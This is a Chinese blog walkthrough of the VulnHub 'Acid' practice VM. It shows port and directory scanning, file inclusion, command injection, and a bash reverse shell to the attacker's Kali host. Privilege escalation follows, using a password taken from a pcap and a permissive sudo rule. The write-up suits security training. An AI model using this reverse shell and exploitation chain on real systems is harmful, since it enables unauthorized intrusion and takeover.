【VulnHub】Acid靶场复盘

0x01 环境搭建

1、靶机下载地址
2、攻击机kali地址192.168.199.134

0x02 靶机发现

将攻击机和靶机的网络模式都设置为nat模式,用nmap -sn发现主机,关闭靶机,再扫一遍,其中少的主机为靶机ip。

0x03 信息收集

1、端口扫描,发现33447端口

┌──(root💀kali)-[~]
└─# nmap -p- 192.168.199.128
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-03 20:42 EST
Nmap scan report for 192.168.199.128
Host is up (0.00044s latency).
Not shown: 65534 closed ports
PORT      STATE SERVICE
33447/tcp open  unknown
MAC Address: 00:0C:29:BB:65:29 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 6.64 seconds

web访问33447端口
在这里插入图片描述

2、网页扫描

(1)使用big.txt字典扫描,发现images目录和其下数据库文件Thumbs.db,无果。

┌──(root💀kali)-[~]
└─# dirb http://192.168.199.128:33447 /usr/share/wordlists/dirb/big.txt                                255 ⨯

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Mar  3 20:48:26 2022
URL_BASE: http://192.168.199.128:33447/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

-----------------

GENERATED WORDS: 20458                                                         

---- Scanning URL: http://192.168.199.128:33447/ ----
==> DIRECTORY: http://192.168.199.128:33447/css/                                                            
==> DIRECTORY: http://192.168.199.128:33447/images/                                                         
+ http://192.168.199.128:33447/server-status (CODE:403|SIZE:306)                                            
                                                                                                            
---- Entering directory: http://192.168.199.128:33447/css/ ----
                                                                                                            
---- Entering directory: http://192.168.199.128:33447/images/ ----
+ http://192.168.199.128:33447/images/Thumbs.db (CODE:200|SIZE:31744)                                       
                                                                                                            
-----------------
END_TIME: Thu Mar  3 20:49:00 2022
DOWNLOADED: 61374 - FOUND: 2

(2)继续查看网页源码,发现提示字符串,0x643239334c6d70775a773d3d

在这里插入图片描述
使用decoder两次解密得到wow.jpg
在这里插入图片描述
常规思路,我们会怀疑图片中存在隐写信息,使用cat命令发现图片末尾有16进制数字
在这里插入图片描述
将3761656530663664353838656439393035656533376631366137633631306434进行ASCII hex转码,得到
7aee0f6d588ed9905ee37f16a7c610d4,这是一串md5。 去cmd5解密,得到63425,推测是一个密码或者ID。至此发现wow.jpg可能是出题者留下的一个坑,此处需要果断放弃,看其他条件

(3)再返回看主页,发现title标签处有提示,发现新目录,这也是CTF常见提示套路。

在这里插入图片描述
在这里插入图片描述

(4)扫描/Challenge目录,发现子目录及PHP页面

┌──(root??kali)-[~]
└─# dirb http://192.168.199.128:33447/Challenge /usr/share/wordlists/dirb/big.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Mar  3 22:03:29 2022
URL_BASE: http://192.168.199.128:33447/Challenge/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

-----------------

GENERATED WORDS: 20458                                                         

---- Scanning URL: http://192.168.199.128:33447/Challenge/ ----
==> DIRECTORY: http://192.168.199.128:33447/Challenge/css/                                                  
==> DIRECTORY: http://192.168.199.128:33447/Challenge/includes/                                             
==> DIRECTORY: http://192.168.199.128:33447/Challenge/js/                                                   
==> DIRECTORY: http://192.168.199.128:33447/Challenge/styles/                                               
                                                                                                            
---- Entering directory: http://192.168.199.128:33447/Challenge/css/ ----
                                                                                                            
---- Entering directory: http://192.168.199.128:33447/Challenge/includes/ ----
                                                                                                            
---- Entering directory: http://192.168.199.128:33447/Challenge/js/ ----
                                                                                                            
---- Entering directory: http://192.168.199.128:33447/Challenge/styles/ ----
                                                                                                            
-----------------
END_TIME: Thu Mar  3 22:04:23 2022
DOWNLOADED: 102290 - FOUND: 0

提交任意参数,观察页面为php页面在这里插入图片描述

(5)使用-X参数扫描,发现cake.php、error.php、include.php、index.php页面

┌──(root??kali)-[~]
└─# dirb http://192.168.199.128:33447/Challenge /usr/share/wordlists/dirb/big.txt -X .php

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Mar  3 22:09:32 2022
URL_BASE: http://192.168.199.128:33447/Challenge/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

-----------------

GENERATED WORDS: 20458                                                         

---- Scanning URL: http://192.168.199.128:33447/Challenge/ ----
+ http://192.168.199.128:33447/Challenge/cake.php (CODE:200|SIZE:496)                                       
+ http://192.168.199.128:33447/Challenge/error.php (CODE:200|SIZE:309)                                      
+ http://192.168.199.128:33447/Challenge/include.php (CODE:302|SIZE:0)                                      
+ http://192.168.199.128:33447/Challenge/index.php (CODE:200|SIZE:1333)      

(6)访问include.php页面,发生302跳转

在这里插入图片描述
进入login页面,随便输入用户名密码,获得cookie,再访问include.php页面
在这里插入图片描述
上burpsuite发现文件包含漏洞,实现可读文件/etc/passwd
在这里插入图片描述

(7)由于没有上传点,再次访问cake.php,发现下级目录/Magic_Box

在这里插入图片描述

(8)继续-X参数扫描,发现low.php和command.php,command.php中有命令执行漏洞

在这里插入图片描述

0x03 漏洞利用

使用通过URL编码的命令进行bash反弹

bash -c 'bash -i >& /dev/tcp/192.168.199.134/6666 0>&1'

在这里插入图片描述
在这里插入图片描述

得到反弹shell

在这里插入图片描述

0x04 权限提升

1、python导入交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

2、进入/tmp目录,发现wget、gcc命令不存在,猜测题意非溢出提权,需要查找密码

┌──(root💀kali)-[~]
└─# nc -lvp 6666                                                                                         1 ⨯
listening on [any] 6666 ...
192.168.199.128: inverse host lookup failed: Unknown host
connect to [192.168.199.134] from (UNKNOWN) [192.168.199.128] 33055
bash: cannot set terminal process group (1430): Inappropriate ioctl for device
bash: no job control in this shell
www-data@acid:/var/www/html/Challenge/Magic_Box$ cd /tmp
cd /tmp
www-data@acid:/tmp$ wget
wget
The program 'wget' is currently not installed. To run 'wget' please ask your administrator to install the package 'wget'
www-data@acid:/tmp$ gcc
gcc
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'
www-data@acid:/tmp$ 

3、查看用户有两个acid和saman

www-data@acid:/tmp$ ls /home       
ls /home
acid
saman
www-data@acid:/tmp$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:104:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:105:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:106:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:107:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:110::/home/syslog:/bin/false
messagebus:x:105:112::/var/run/dbus:/bin/false
uuidd:x:106:113::/run/uuidd:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
ntp:x:108:117::/home/ntp:/bin/false
whoopsie:x:109:118::/nonexistent:/bin/false
acid:x:1000:1000:acid,,,:/home/acid:/bin/bash
mysql:x:111:126:MySQL Server,,,:/nonexistent:/bin/false
saman:x:1001:1001:,,,:/home/saman:/bin/bash
www-data@acid:/tmp$ 

4、查看用户文件

这类提权题目一般是通过文件中查找普通用户密码,进而通过sudo或者suid提权,因此查找用户文件这条命令必不可少需要记忆并熟练使用

find / -user acid 2>/dev/null

进入到home目录,发现有两个普通用户,acid和saman,查看acid所属文件,发现流量包hint.pcapng

www-data@acid:/var/www/html/Challenge/Magic_Box$ cd /home
cd /home
www-data@acid:/home$ ls
ls
acid
saman
www-data@acid:/home$ find / -user acid 2>/dev/null
find / -user acid 2>/dev/null
/sbin/raw_vs_isi/hint.pcapng
/bin/pwn_me
/bin/pwn_me/chkrootkit.lsm
/bin/pwn_me/chkrootkit
/bin/pwn_me/README.chkwtmp
/bin/pwn_me/ACKNOWLEDGMENTS
/bin/pwn_me/chkdirs.c
/bin/pwn_me/ifpromisc.c
/bin/pwn_me/Makefile
/bin/pwn_me/chklastlog.c
/bin/pwn_me/strings.c
/bin/pwn_me/chkwtmp.c
/bin/pwn_me/README.chklastlog
/bin/pwn_me/COPYRIGHT
/bin/pwn_me/chkproc.c
/bin/pwn_me/README
/bin/pwn_me/chkutmp.c
/bin/pwn_me/check_wtmpx.c
/var/lib/lightdm-data/acid
/var/www/html/Challenge/less
/var/www/html/Challenge/less/style.less
/var/www/html/Challenge/css
/var/www/html/Challenge/css/style.css
/var/www/html/Challenge/css/style.css.save
/var/www/html/index.html
/var/www/html/images
/var/www/html/images/bg.jpg
/var/www/html/images/Thumbs.db
/var/www/html/images/wow.jpg
/var/www/html/css
/var/www/html/css/style.css
/home/acid
/home/acid/.xsession-errors.old
/home/acid/Public
/home/acid/.thumbnails
/home/acid/Desktop
/home/acid/.mozilla
/home/acid/.gconf
/home/acid/Videos
/home/acid/Templates
/home/acid/.config
/home/acid/Music
/home/acid/.profile
/home/acid/.bashrc
/home/acid/.sudo_as_admin_successful
/home/acid/Downloads
/home/acid/.xsession-errors
/home/acid/.dmrc
/home/acid/.Xauthority
/home/acid/.local
/home/acid/.local/share
/home/acid/.xscreensaver
/home/acid/.bash_history
/home/acid/.bash_logout
/home/acid/.cache
/home/acid/.cache/ibus
/home/acid/.cache/ibus/bus
/home/acid/.cache/ibus/bus/registry
/home/acid/.cache/update-manager-core
/home/acid/.cache/update-manager-core/meta-release
/home/acid/.cache/event-sound-cache.tdb.d08d798c4c9c42baa2b60403184f4c66.i686-pc-linux-gnu
/home/acid/.cache/lxpanel-indicator-plugin.log
/home/acid/.cache/fontconfig
/home/acid/.cache/fontconfig/cabbd14511b9e8a55e92af97fb3a0461-le32d4.cache-4
/home/acid/.cache/fontconfig/CACHEDIR.TAG
/home/acid/.cache/motd.legal-displayed
/home/acid/.cache/vmware
/home/acid/.cache/openbox
/home/acid/.cache/openbox/openbox.log
/home/acid/.cache/openbox/sessions
/home/acid/.cache/lxsession
/home/acid/.cache/lxsession/Lubuntu
/home/acid/.cache/lxsession/Lubuntu/run.log
/home/acid/.cache/usb-creator.log
/home/acid/.cache/gstreamer-1.0
/home/acid/.cache/gstreamer-1.0/registry.i686.bin
/home/acid/.cache/menus
/home/acid/.cache/mozilla
/home/acid/.dbus
/home/acid/Documents
/home/acid/.selected_editor
/home/acid/Pictures

5、流量包文件分析发现saman密码

将流量包cp到web目录,下载到kali,并且打开,过滤data,发现saman的密码1337hax0r

在这里插入图片描述

6、利用sudo配置不当提权

python导入pty生成交互式shell,使用su命令切换到saman,发现密码正确。发现sudo配置不当,权限过大,直接提权到root

www-data@acid:/home$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@acid:/home$ ls
ls
acid  saman
www-data@acid:/home$ su - saman
su - saman
Password: 1337hax0r

saman@acid:~$ whoami
whoami
saman
saman@acid:~$ sudo -l
sudo -l
[sudo] password for saman: 1337hax0r

Matching Defaults entries for saman on acid:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User saman may run the following commands on acid:
    (ALL : ALL) ALL
saman@acid:~$ sudo su -
sudo su -
  ____                            _         _       _   _                 
 / ___|___  _ __   __ _ _ __ __ _| |_ _   _| | __ _| |_(_) ___  _ __  ___ 
| |   / _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \/ __|
| |__| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | \__ \
 \____\___/|_| |_|\__, |_|  \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|___/
                  |___/                                                   
root@acid:~# 

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值